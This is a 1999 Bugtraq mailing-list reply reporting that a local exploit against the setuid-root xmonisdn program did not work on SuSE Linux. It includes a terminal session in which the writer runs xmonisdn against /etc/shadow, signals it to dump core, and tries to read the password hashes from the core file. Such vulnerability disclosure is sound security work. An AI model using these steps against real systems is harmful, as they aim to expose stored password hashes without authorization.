Bugtraq mailing list archives
Re: xmonisdn (isdn4k-utils/Linux) bug report
From: sysadmin () TATOOINE PING DE (Jan-Hendrik Terstegge)
Date: Wed, 20 Oct 1999 13:40:00 +0000
On Tue, 19 Oct 1999 Ron wrote:
While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit. (Tested on my workstation, which is running Red Hat Linux 6.0) [... exploit ...]
I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it seems as if it was an only RedHat Linux exploit. This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my xmonisdn dies only with an Floating exception but it doesn't dump a core. ---snip--- [pts/[pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn /usr/bin -rwsr-xr-x 1 root root 15340 Jul 23 01:20 xmonisdn [pts/[pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow [1] + Stopped xmonisdn -file /etc/shadow [pts/[pts/0@tatooine] /usr/bin > bg [1] xmonisdn -file /etc/shadow & [pts/[pts/0@tatooine] /usr/bin > killall -8 xmonisdn [1] Floating exception xmonisdn -file /etc/shadow [pts/[pts/0@tatooine] /usr/bin > strings core |less strings: core: File or Directory not found ---snip--- -- Jan-Hendrik Terstegge <sysadmin () tatooine ping de>
Current thread:
- Re: execve bug linux-2.2.12, (continued)
- Re: execve bug linux-2.2.12 Taneli Huuskonen (Oct 19)
- Re: execve bug linux-2.2.12 Alan Cox (Oct 20)
- Microsoft Security Bulletin (MS99-044) Aleph One (Oct 20)
- Re: execve bug linux-2.2.12 Timo Felbinger (Oct 20)
- CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Aleph One (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Richard Trott (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Chad Price (Oct 21)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Gregory A Lundberg (Oct 21)
- Remote DoS in Axent's Raptor 6.0 Mike Frantzen (Oct 20)
- xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 18)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Jan-Hendrik Terstegge (Oct 20)
- Last weeks release: whisker (new web scanner) rfp () WIRETRIP NET (Oct 20)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 20)
- Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Olaf Selke (Oct 20)
- DoS in Eicon ISDN Modem is now fixed Aviram Jenik (Oct 20)
- Re: Microsoft Security Bulletin (MS99-043) David Schwartz (Oct 18)